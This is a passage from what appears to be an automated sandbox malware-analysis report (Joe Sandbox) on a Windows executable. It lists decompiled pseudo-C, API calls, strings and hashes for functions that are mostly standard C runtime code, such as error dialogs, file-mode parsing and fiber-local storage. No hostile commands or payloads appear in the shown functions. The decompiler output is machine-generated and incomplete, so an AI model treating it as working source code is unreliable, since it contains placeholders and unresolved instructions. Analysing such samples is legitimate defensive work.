				void* _t40;
				void* _t41;
				signed long long _t46;
				signed long long _t47;
				long long _t48;
				long long _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				E00007FF77FF7DA8DAD20(0x1840, __rax, _t76, _t77);
				_t67 = _t66 - __rax;
				_t46 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t47 = _t46 ^ _t66 - __rax;
				_a6168 = _t47;
				_t64 = __rcx;
				E00007FF77FF7DA8D1040(GetLastError());
				_a16 =  &_a6232;
				r8d = 0x400;
				_a8 = 0;
				E00007FF77FF7DA8E3B34(_t40, _t41,  *_t47 | 0x00000002,  &_a1048, __r8, _a6224);
				E00007FF77FF7DA8D7420(_t24, _t47, __r8);
				_a16 = _t47;
				_a8 = _t64;
				E00007FF77FF7DA8D1B30(_t47,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t47, _t48,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t47 == 0) goto 0xda8d2734;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t47, _t48,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d274e;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t67);
			}

0x7ff7da8d2620
0x7ff7da8d2625
0x7ff7da8d262a
0x7ff7da8d2637
0x7ff7da8d263c
0x7ff7da8d263f
0x7ff7da8d2646
0x7ff7da8d2649
0x7ff7da8d2651
0x7ff7da8d2664
0x7ff7da8d2679
0x7ff7da8d267e
0x7ff7da8d2684
0x7ff7da8d2694
0x7ff7da8d269b
0x7ff7da8d26a0
0x7ff7da8d26b4
0x7ff7da8d26c3
0x7ff7da8d26d2
0x7ff7da8d26d8
0x7ff7da8d26dd
0x7ff7da8d26f0
0x7ff7da8d26f8
0x7ff7da8d26fa
0x7ff7da8d270f
0x7ff7da8d2714
0x7ff7da8d272c
0x7ff7da8d2732
0x7ff7da8d2734
0x7ff7da8d2768

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654

Part of subcall function 00007FF7DA8D7420: GetLastError.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7447
Part of subcall function 00007FF7DA8D7420: FormatMessageW.KERNEL32(00000000,00007FF7DA8D26A0), ref: 00007FF7DA8D7476

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D272C
MessageBoxA.USER32 ref: 00007FF7DA8D2748

Strings

%s%s: %s, xrefs: 00007FF7DA8D26AD
Fatal error detected, xrefs: 00007FF7DA8D2700, 00007FF7DA8D273A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: be8159d4da1d623935737f66ca6ff985e81d9fc44c37ffb99e0b19b8c9617921
Instruction ID: 2d6a88e73cbd17366423fdfdf4cd0b623453e611bc7719bc5bcfe24b5d30b087
Opcode Fuzzy Hash: be8159d4da1d623935737f66ca6ff985e81d9fc44c37ffb99e0b19b8c9617921
Instruction Fuzzy Hash: E6317C72628A8291FB21AB10E4506EEE364FB84784FC44037EE8D02A9ADF3CD615CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E8830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7DA8E8855
GetProcAddress.KERNEL32 ref: 00007FF7DA8E886B
FreeLibrary.KERNEL32 ref: 00007FF7DA8E8892

Strings

mscoree.dll, xrefs: 00007FF7DA8E884C
CorExitProcess, xrefs: 00007FF7DA8E8864

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 43ec2fa5b206ef50a85d8791d4c505ac4782749c279514a83b9864bfeb17bd1e
Instruction ID: f6fbaa43aff5438410b0abd656ae3bf7d6a4ef96f7d0dc9f7f198edc6e562dd9
Opcode Fuzzy Hash: 43ec2fa5b206ef50a85d8791d4c505ac4782749c279514a83b9864bfeb17bd1e
Instruction Fuzzy Hash: AEF0AF61A0960381FA15AB24E84433DE360BF997A5FD40676CE7E462E5CF2CD568C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F86F4 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FF77FF7DA8F86F4(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0xda8f8726;
				if (sil >= 0) goto 0xda8f8726;
				E00007FF77FF7DA8F8E8C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0xda8f877d;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0xda8f8741;
				asm("dec eax");
				if (_t42 >= 0) goto 0xda8f8741;
				E00007FF77FF7DA8F8E8C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0xda8f877d;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0xda8f875d;
				asm("dec eax");
				if (_t43 >= 0) goto 0xda8f875d;
				E00007FF77FF7DA8F8E8C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0xda8f877d;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0xda8f877d;
				asm("dec eax");
				if (_t44 >= 0) goto 0xda8f877d;
				if ((dil & 0x00000010) == 0) goto 0xda8f877a;
				E00007FF77FF7DA8F8E8C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0xda8f8797;
				asm("dec eax");
				if (_t46 >= 0) goto 0xda8f8797;
				E00007FF77FF7DA8F8E8C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x7ff7da8f86f4
0x7ff7da8f86f9
0x7ff7da8f8708
0x7ff7da8f8710
0x7ff7da8f8715
0x7ff7da8f871c
0x7ff7da8f8721
0x7ff7da8f8724
0x7ff7da8f872b
0x7ff7da8f872e
0x7ff7da8f8730
0x7ff7da8f8735
0x7ff7da8f8737
0x7ff7da8f873c
0x7ff7da8f873f
0x7ff7da8f8741
0x7ff7da8f8745
0x7ff7da8f8747
0x7ff7da8f874c
0x7ff7da8f8753
0x7ff7da8f8758
0x7ff7da8f875b
0x7ff7da8f875d
0x7ff7da8f8761
0x7ff7da8f8763
0x7ff7da8f8768
0x7ff7da8f876e
0x7ff7da8f8775
0x7ff7da8f877a
0x7ff7da8f877d
0x7ff7da8f8781
0x7ff7da8f8783
0x7ff7da8f8788
0x7ff7da8f878f
0x7ff7da8f87ad

APIs

_set_statfp.LIBCMT ref: 00007FF7DA8F871C
_set_statfp.LIBCMT ref: 00007FF7DA8F8737
_set_statfp.LIBCMT ref: 00007FF7DA8F8753
_set_statfp.LIBCMT ref: 00007FF7DA8F878F

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction ID: 535853d5476a1173e797268cb5d8e5569c343a55e212608709a48fde3b9477d3
Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
Instruction Fuzzy Hash: 7D119126EDCA0341F7563224E44637D94407F793B4FD806F6FE6E062EB8E2CA8618230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA7B0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA7CF
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA7EE
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA816
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA827
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8EA838

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ae37bf6e24a8dd905a76ae05698ba97ed43999bcb7fb52e3d420ae191858aa1b
Instruction ID: aa84316d70e78753de3408a44298c12f1b4f23709343bddb3da6ecd87387da8e
Opcode Fuzzy Hash: ae37bf6e24a8dd905a76ae05698ba97ed43999bcb7fb52e3d420ae191858aa1b
Instruction Fuzzy Hash: F6119D60F08342C1FA5AB721558117DE2417F60BB0FC447B6ED3D467C7DE2EE6628220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA644 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA655
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA674
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA69C
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA6AD
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF), ref: 00007FF7DA8EA6BE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 816c375c59e6c69434a8927f5b871f6c7aa6df51c201acfb1bf02bf764e9639a
Instruction ID: 863c26ec0eca70e2182ff8186fc4a82a5862c8f3c797f2de9afe29225a91efcb
Opcode Fuzzy Hash: 816c375c59e6c69434a8927f5b871f6c7aa6df51c201acfb1bf02bf764e9639a
Instruction Fuzzy Hash: 611136A0E08203C1F96AB621445117DE2417F72BB4EC54BB6ED3E4A2E3DD2EF6608231

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EF0E8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00007FF77FF7DA8EF0E8(long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				signed int _t31;
				signed int _t33;
				signed int _t36;
				signed int _t49;
				signed int _t56;
				void* _t61;
				void* _t83;
				signed int _t89;
				void* _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t129;
				signed short* _t131;
				signed short* _t132;
				long long _t136;
				signed int _t138;
				signed short* _t142;
				signed short* _t143;
				void* _t144;

				_t109 = _t138;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = _t136;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				 *__rcx = _t109;
				__rcx[2] = 0;
				r14d = 0x20;
				_t31 =  *0xda91c9dc; // 0x0
				__rcx[1] = _t31;
				goto 0xda8ef12b;
				_t142 = __rdx + 2;
				_t33 =  *_t142 & 0x0000ffff;
				if (_t33 == r14w) goto 0xda8ef123;
				if (_t33 == 0x61) goto 0xda8ef158;
				if (_t33 == 0x72) goto 0xda8ef14f;
				if (_t33 != 0x77) goto 0xda8ef3bc;
				 *__rcx = 0x301;
				goto 0xda8ef15e;
				__rcx[1] = 1;
				goto 0xda8ef165;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t143 =  &(_t142[1]);
				r9b = bpl;
				dil = bpl;
				r10b = bpl;
				r11b = bpl;
				_t9 = _t136 + 0xa; // 0xa
				if ( *_t143 == 0) goto 0xda8ef2ce;
				_t56 =  *_t143 & 0x0000ffff;
				_t83 = _t56 - 0x53;
				if (_t83 > 0) goto 0xda8ef238;
				if (_t83 == 0) goto 0xda8ef221;
				if (_t83 == 0) goto 0xda8ef2b9;
				if (_t83 == 0) goto 0xda8ef1ef;
				if (_t83 == 0) goto 0xda8ef1e7;
				if (_t83 == 0) goto 0xda8ef1d5;
				_t61 = _t56 - r14d - 0xfffffffffffffff2 - _t9;
				if (_t83 == 0) goto 0xda8ef1cc;
				if (_t61 != 4) goto 0xda8ef3bc;
				if (r10b != 0) goto 0xda8ef2ac;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0xda8ef22d;
				asm("bts dword [ebx], 0x7");
				goto 0xda8ef2b7;
				if (( *__rcx & 0x00000040) != 0) goto 0xda8ef2ac;
				goto 0xda8ef2b5;
				r11b = 1;
				goto 0xda8ef2ac;
				if (dil != 0) goto 0xda8ef2ac;
				_t36 =  *__rcx;
				dil = 1;
				if ((_t36 & 0x00000002) != 0) goto 0xda8ef2ac;
				 *__rcx = _t36 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0xda8ef2b9;
				_t89 = r10b;
				if (_t89 != 0) goto 0xda8ef2ac;
				 *__rcx =  *__rcx | r14d;
				r10b = 1;
				goto 0xda8ef2b9;
				if (_t89 == 0) goto 0xda8ef2a4;
				if (_t89 == 0) goto 0xda8ef295;
				if (_t89 == 0) goto 0xda8ef283;
				if (_t89 == 0) goto 0xda8ef277;
				if (_t89 == 0) goto 0xda8ef268;
				_t90 = _t61 - 0x34 - 4;
				if (_t90 != 0) goto 0xda8ef3bc;
				asm("bt eax, 0x9");
				if (_t90 >= 0) goto 0xda8ef2ac;
				asm("bts eax, 0xa");
				goto 0xda8ef2b5;
				if (( *__rcx & 0x0000c000) != 0) goto 0xda8ef2ac;
				asm("bts eax, 0xe");
				goto 0xda8ef2b5;
				if (r9b != 0) goto 0xda8ef2ac;
				asm("btr dword [ebx+0x4], 0xb");
				goto 0xda8ef28d;
				if (r9b != 0) goto 0xda8ef2ac;
				asm("bts dword [ebx+0x4], 0xb");
				r9b = 1;
				goto 0xda8ef2b9;
				_t94 =  *__rcx & 0x0000c000;
				if (_t94 != 0) goto 0xda8ef2ac;
				asm("bts eax, 0xf");
				goto 0xda8ef2b5;
				asm("bt eax, 0xc");
				if (_t94 >= 0) goto 0xda8ef2b1;
				goto 0xda8ef2b9;
				asm("bts eax, 0xc");
				asm("dec eax");
				_t144 = _t143 + __rcx;
				if (1 != 0) goto 0xda8ef17c;
				_t128 =  ==  ? _t144 : _t144 + 2;
				goto 0xda8ef2df;
				_t129 = ( ==  ? _t144 : _t144 + 2) + 2;
				if ( *_t129 == r14w) goto 0xda8ef2db;
				if (r11b != 0) goto 0xda8ef2fc;
				if ( *_t129 != 0) goto 0xda8ef3bc;
				__rcx[2] = 1;
				goto 0xda8ef3cc;
				r8d = 3;
				if (E00007FF77FF7DA8E9950(_t144) != 0) goto 0xda8ef3bc;
				goto 0xda8ef323;
				_t131 = _t129 + 8;
				_t49 =  *_t131 & 0x0000ffff;
				if (_t49 == r14w) goto 0xda8ef31f;
				if (_t49 != 0x3d) goto 0xda8ef3bc;
				_t132 =  &(_t131[1]);
				if ( *_t132 == r14w) goto 0xda8ef336;
				r8d = 5;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef35f;
				asm("bts dword [ebx], 0x12");
				goto 0xda8ef3a1;
				r8d = 8;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef381;
				asm("bts dword [ebx], 0x11");
				goto 0xda8ef3a1;
				r8d = 7;
				if (E00007FF77FF7DA8F53C4(_t109, _t132) != 0) goto 0xda8ef3bc;
				asm("bts dword [ebx], 0x10");
				goto 0xda8ef3ab;
				if (( *(_t132 + __rsi + 2) & 0x0000ffff) == r14w) goto 0xda8ef3a7;
				goto 0xda8ef2ed;
				E00007FF77FF7DA8E4394(_t109);
				 *_t109 = 0x16;
				return E00007FF77FF7DA8E9D00();
			}

0x7ff7da8ef0e8
0x7ff7da8ef0eb
0x7ff7da8ef0ef
0x7ff7da8ef0f3
0x7ff7da8ef0f7
0x7ff7da8ef106
0x7ff7da8ef10c
0x7ff7da8ef10f
0x7ff7da8ef115
0x7ff7da8ef11b
0x7ff7da8ef121
0x7ff7da8ef123
0x7ff7da8ef127
0x7ff7da8ef12f
0x7ff7da8ef135
0x7ff7da8ef13b
0x7ff7da8ef141
0x7ff7da8ef147
0x7ff7da8ef14d
0x7ff7da8ef14f
0x7ff7da8ef156
0x7ff7da8ef158
0x7ff7da8ef15e
0x7ff7da8ef165
0x7ff7da8ef16d
0x7ff7da8ef170
0x7ff7da8ef173
0x7ff7da8ef176
0x7ff7da8ef179
0x7ff7da8ef180
0x7ff7da8ef186
0x7ff7da8ef18a
0x7ff7da8ef18d
0x7ff7da8ef193
0x7ff7da8ef19c
0x7ff7da8ef1a5
0x7ff7da8ef1aa
0x7ff7da8ef1af
0x7ff7da8ef1b1
0x7ff7da8ef1b3
0x7ff7da8ef1b8
0x7ff7da8ef1c1
0x7ff7da8ef1c7
0x7ff7da8ef1ca
0x7ff7da8ef1cc
0x7ff7da8ef1d0
0x7ff7da8ef1d9
0x7ff7da8ef1e2
0x7ff7da8ef1e7
0x7ff7da8ef1ea
0x7ff7da8ef1f2
0x7ff7da8ef1f8
0x7ff7da8ef1fa
0x7ff7da8ef1ff
0x7ff7da8ef20e
0x7ff7da8ef219
0x7ff7da8ef21c
0x7ff7da8ef221
0x7ff7da8ef224
0x7ff7da8ef22a
0x7ff7da8ef22d
0x7ff7da8ef233
0x7ff7da8ef23b
0x7ff7da8ef240
0x7ff7da8ef245
0x7ff7da8ef24a
0x7ff7da8ef24f
0x7ff7da8ef251
0x7ff7da8ef254
0x7ff7da8ef25c
0x7ff7da8ef260
0x7ff7da8ef262
0x7ff7da8ef266
0x7ff7da8ef26f
0x7ff7da8ef271
0x7ff7da8ef275
0x7ff7da8ef27a
0x7ff7da8ef27c
0x7ff7da8ef281
0x7ff7da8ef286
0x7ff7da8ef288
0x7ff7da8ef28d
0x7ff7da8ef293
0x7ff7da8ef297
0x7ff7da8ef29c
0x7ff7da8ef29e
0x7ff7da8ef2a2
0x7ff7da8ef2a6
0x7ff7da8ef2aa
0x7ff7da8ef2af
0x7ff7da8ef2b1
0x7ff7da8ef2bd
0x7ff7da8ef2c3
0x7ff7da8ef2c8
0x7ff7da8ef2d5
0x7ff7da8ef2d9
0x7ff7da8ef2db
0x7ff7da8ef2e3
0x7ff7da8ef2e8
0x7ff7da8ef2ed
0x7ff7da8ef2f3
0x7ff7da8ef2f7
0x7ff7da8ef2fc
0x7ff7da8ef313
0x7ff7da8ef31d
0x7ff7da8ef31f
0x7ff7da8ef323
0x7ff7da8ef32a
0x7ff7da8ef330
0x7ff7da8ef336
0x7ff7da8ef33e
0x7ff7da8ef340
0x7ff7da8ef357
0x7ff7da8ef359
0x7ff7da8ef35d
0x7ff7da8ef35f
0x7ff7da8ef376
0x7ff7da8ef378
0x7ff7da8ef37f
0x7ff7da8ef381
0x7ff7da8ef398
0x7ff7da8ef39a
0x7ff7da8ef3a5
0x7ff7da8ef3b2
0x7ff7da8ef3b7
0x7ff7da8ef3bc
0x7ff7da8ef3c1
0x7ff7da8ef3e9

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EF3C7

Part of subcall function 00007FF7DA8F53C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F53E1

Strings

UTF-8, xrefs: 00007FF7DA8EF346
ccs, xrefs: 00007FF7DA8EF302
UTF-16LEUNICODE, xrefs: 00007FF7DA8EF365

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: abbf5a816cf9790d87ba27718c5909264acedcf573467f627084beda8466296f
Instruction ID: cd5cba1d9fa43e235ed0e76f0020f230da25ac1a3bad6b98b0dcd543ff5feb44
Opcode Fuzzy Hash: abbf5a816cf9790d87ba27718c5909264acedcf573467f627084beda8466296f
Instruction Fuzzy Hash: 4981A436D0A643C5F6676E25C11027DB690BB31B48FD580B7CE0D97287DB2EEE219721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DE068 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8DE068(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0xda8de10c;
				E00007FF77FF7DA8DCC80(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0xda8de127;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00007FF77FF7DA8DCC80(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0xda8de127;
				if ( *__rcx == 0xe0434f4d) goto 0xda8de127;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0xda8de12b;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00007FF77FF7DA8DD128(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0xda8de12b;
				return _t19;
			}

0x7ff7da8de068
0x7ff7da8de06b
0x7ff7da8de06f
0x7ff7da8de073
0x7ff7da8de082
0x7ff7da8de086
0x7ff7da8de09c
0x7ff7da8de09e
0x7ff7da8de0a3
0x7ff7da8de0b0
0x7ff7da8de0b4
0x7ff7da8de0bd
0x7ff7da8de0c6
0x7ff7da8de0cf
0x7ff7da8de0d8
0x7ff7da8de0dc
0x7ff7da8de0ec
0x7ff7da8de0f4
0x7ff7da8de0f9
0x7ff7da8de0fe
0x7ff7da8de103
0x7ff7da8de10a
0x7ff7da8de126

APIs

EncodePointer.KERNEL32 ref: 00007FF7DA8DE0B4
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7DA8DE103

Strings

RCC, xrefs: 00007FF7DA8DE0D1
MOC, xrefs: 00007FF7DA8DE0C8

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

